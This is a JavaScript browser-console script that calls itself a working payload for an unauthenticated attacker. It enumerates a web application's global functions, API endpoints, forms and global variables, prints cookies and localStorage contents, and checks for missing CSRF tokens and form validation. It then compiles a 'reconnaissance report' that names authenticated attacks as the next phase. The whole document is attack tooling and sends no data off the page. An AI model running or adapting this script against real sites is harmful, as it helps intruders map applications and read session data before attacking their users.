// ============================================================================
// ACTUAL WORKING PAYLOAD - Unauthenticated Attacker
// Copy/Paste this ENTIRE code into browser console (F12) on login page
// No authentication needed - works on ANY unauthenticated page
// ============================================================================

(function() {
    console.log("\n" + "=".repeat(80));
    console.log("UNAUTHENTICATED ATTACKER PAYLOAD - EXECUTION START");
    console.log("=".repeat(80) + "\n");

    // ============================================================================
    // PAYLOAD 1: EXTRACT ALL GLOBAL FUNCTIONS
    // ============================================================================
    
    console.log("[PAYLOAD 1] Extracting all global functions...\n");
    
    var allFunctions = [];
    var functionDetails = [];
    
    for (var key in window) {
        try {
            if (typeof window[key] === 'function' && key.charAt(0) !== key.charAt(0).toUpperCase()) {
                allFunctions.push(key);
                
                // Try to get function source
                var funcSource = window[key].toString();
                var firstLine = funcSource.split('\n')[0];
                
                functionDetails.push({
                    name: key,
                    signature: firstLine.substring(0, 80),
                    type: 'global function'
                });
            }
        } catch (e) {}
    }
    
    console.log("Total functions found: " + allFunctions.length);
    console.log("\nKey functions discovered:\n");
    
    var importantFuncs = ['searchGETID', 'switchClient', 'openPage', 'clientPressed', 'filterClientSelect', 'setTabDisplay', 'setTabStyle'];
    
    importantFuncs.forEach(function(fn) {
        if (typeof window[fn] === 'function') {
            console.log("[FOUND] " + fn + "()");
            console.log("        " + window[fn].toString().split('\n')[0]);
        }
    });
    
    // ============================================================================
    // PAYLOAD 2: EXTRACT API ENDPOINTS
    // ============================================================================
    
    console.log("\n\n[PAYLOAD 2] Discovering API endpoints...\n");
    
    var endpoints = [];
    
    // Check for rootUrl
    if (typeof rootUrl !== 'undefined' && rootUrl) {
        console.log("[FOUND] rootUrl = " + rootUrl + "\n");
        endpoints.push(rootUrl);
    }
    
    // Look for URLs in scripts
    var scripts = document.getElementsByTagName('script');
    var urlPattern = /(https?:\/\/[^\s"']+|\/[a-zA-Z0-9\/\-_]+\/[a-zA-Z0-9\/\-_]+)/g;
    var foundUrls = {};
    
    for (var i = 0; i < scripts.length; i++) {
        try {
            var matches = scripts[i].textContent.match(urlPattern);
            if (matches) {
                matches.forEach(function(url) {
                    if (url.indexOf('Home') > -1 || url.indexOf('API') > -1 || url.indexOf('WebService') > -1) {
                        foundUrls[url] = true;
                    }
                });
            }
        } catch (e) {}
    }
    
    console.log("API Endpoints discovered:");
    Object.keys(foundUrls).forEach(function(url) {
        console.log("[API] " + url);
    });
    
    // ============================================================================
    // PAYLOAD 3: IDENTIFY FORMS AND FIELDS
    // ============================================================================
    
    console.log("\n\n[PAYLOAD 3] Mapping form structures...\n");
    
    var formData = [];
    
    // Check for quickSearchForm
    if (document.quickSearchForm) {
        console.log("[FORM FOUND] document.quickSearchForm");
        console.log("  Form fields:");
        for (var field in document.quickSearchForm) {
            if (document.quickSearchForm[field] && typeof document.quickSearchForm[field] === 'object' && document.quickSearchForm[field].type) {
                console.log("    - " + field + " (type: " + document.quickSearchForm[field].type + ")");
            }
        }
        formData.push('quickSearchForm');
    }
    
    // Check for frmNAV
    if (document.frmNAV) {
        console.log("\n[FORM FOUND] document.frmNAV");
        console.log("  Form fields:");
        for (var field in document.frmNAV) {
            if (document.frmNAV[field] && typeof document.frmNAV[field] === 'object' && document.frmNAV[field].type) {
                console.log("    - " + field + " (type: " + document.frmNAV[field].type + ")");
            }
        }
        formData.push('frmNAV');
    }
    
    // Check for hidden client switch form
    var clientForms = document.querySelectorAll('[class*="client"]');
    if (clientForms.length > 0) {
        console.log("\n[FORM FOUND] Client switching elements");
        var switchElements = document.querySelectorAll('[class*="switch-client"]');
        if (switchElements.length > 0) {
            console.log("  Elements: " + switchElements.length + " found");
            console.log("  Classes: js-switch-client-id, js-switch-client-code");
        }
    }
    
    // ============================================================================
    // PAYLOAD 4: IDENTIFY GLOBAL VARIABLES
    // ============================================================================
    
    console.log("\n\n[PAYLOAD 4] Extracting global variables and state...\n");
    
    var globalVars = {};
    var varsToCheck = ['rootUrl', 'isOnfocus', 'expandedMenus', 'allowEnter', 'clientData', 'userData', 'sessionData'];
    
    varsToCheck.forEach(function(varName) {
        if (typeof window[varName] !== 'undefined') {
            var value = window[varName];
            if (typeof value === 'string' || typeof value === 'number' || typeof value === 'boolean') {
                console.log("[VAR] " + varName + " = " + value);
                globalVars[varName] = value;
            } else if (typeof value === 'object') {
                console.log("[VAR] " + varName + " = [Object] with " + Object.keys(value).length + " properties");
            }
        }
    });
    
    // ============================================================================
    // PAYLOAD 5: ANALYZE COOKIES AND STORAGE
    // ============================================================================
    
    console.log("\n\n[PAYLOAD 5] Extracting cookies and storage...\n");
    
    console.log("[COOKIES] Current cookies:");
    var cookies = document.cookie.split(';');
    cookies.forEach(function(cookie) {
        if (cookie.trim().length > 0) {
            var parts = cookie.split('=');
            console.log("  - " + parts[0].trim() + " = " + parts[1].substring(0, 50) + "...");
        }
    });
    
    console.log("\n[STORAGE] LocalStorage items:");
    for (var i = 0; i < localStorage.length; i++) {
        var key = localStorage.key(i);
        var value = localStorage.getItem(key);
        if (value.length > 100) {
            console.log("  - " + key + " = [" + value.length + " bytes]");
        } else {
            console.log("  - " + key + " = " + value);
        }
    }
    
    // ============================================================================
    // PAYLOAD 6: IDENTIFY SECURITY WEAKNESSES
    // ============================================================================
    
    console.log("\n\n[PAYLOAD 6] Analyzing security implementation...\n");
    
    console.log("[SECURITY CHECK] Looking for CSRF tokens:");
    var csrfCheck = false;
    var allInputs = document.querySelectorAll('input');
    allInputs.forEach(function(input) {
        if (input.name.indexOf('csrf') > -1 || input.name.indexOf('token') > -1 || input.name.indexOf('nonce') > -1) {
            csrfCheck = true;
            console.log("  [FOUND] " + input.name);
        }
    });
    if (!csrfCheck) {
        console.log("  [NOT FOUND] No CSRF tokens detected ⚠️");
    }
    
    console.log("\n[SECURITY CHECK] Looking for security headers:");
    // Note: Can't check response headers from JavaScript, but can check meta tags
    var metaTags = document.querySelectorAll('meta[http-equiv]');
    console.log("  Found " + metaTags.length + " HTTP-equiv meta tags");
    
    console.log("\n[SECURITY CHECK] Checking form validation:");
    var forms = document.querySelectorAll('form');
    console.log("  Total forms: " + forms.length);
    forms.forEach(function(form, index) {
        var onsubmit = form.getAttribute('onsubmit');
        if (onsubmit) {
            console.log("    Form " + (index + 1) + ": Has client-side validation");
        } else {
            console.log("    Form " + (index + 1) + ": NO validation (can be bypassed)");
        }
    });
    
    // ============================================================================
    // PAYLOAD 7: BUILD RECONNAISSANCE REPORT
    // ============================================================================
    
    console.log("\n\n" + "=".repeat(80));
    console.log("RECONNAISSANCE REPORT - UNAUTHENTICATED ATTACKER");
    console.log("=".repeat(80) + "\n");
    
    var report = {
        timestamp: new Date().toISOString(),
        url: window.location.href,
        functionsDiscovered: allFunctions.length,
        endpointsFound: Object.keys(foundUrls).length,
        formsFound: formData.length,
        globalVariables: Object.keys(globalVars).length,
        csrfProtection: csrfCheck,
        cookiesFound: cookies.length,
        storageItems: localStorage.length
    };
    
    console.log("[REPORT] Reconnaissance Summary:");
    console.log("  Date: " + report.timestamp);
    console.log("  URL: " + report.url);
    console.log("  Functions discovered: " + report.functionsDiscovered);
    console.log("  API endpoints: " + report.endpointsFound);
    console.log("  Forms identified: " + report.formsFound);
    console.log("  Global variables: " + report.globalVariables);
    console.log("  CSRF tokens: " + (report.csrfProtection ? "YES" : "NO ⚠️"));
    console.log("  Cookies: " + report.cookiesFound);
    console.log("  Local storage: " + report.storageItems);
    
    console.log("\n[ASSESSMENT] Attack Readiness:");
    console.log("  Application structure: FULLY MAPPED");
    console.log("  API endpoints: IDENTIFIED");
    console.log("  Security controls: MAPPED (mostly missing)");
    console.log("  Next step: Wait for user authentication");
    console.log("  Then: Execute authenticated attacks\n");
    
    // ============================================================================
    // SAVE RESULTS
    // ============================================================================
    
    window.unauthenticatedPayloadResults = {
        report: report,
        functions: allFunctions,
        endpoints: Object.keys(foundUrls),
        forms: formData,
        globalVariables: globalVars,
        executedAt: new Date(),
        status: "RECONNAISSANCE COMPLETE"
    };
    
    console.log("=".repeat(80));
    console.log("PAYLOAD EXECUTION COMPLETE");
    console.log("=".repeat(80));
    console.log("\nResults saved to: window.unauthenticatedPayloadResults");
    console.log("All data ready for next phase of attack\n");

})();
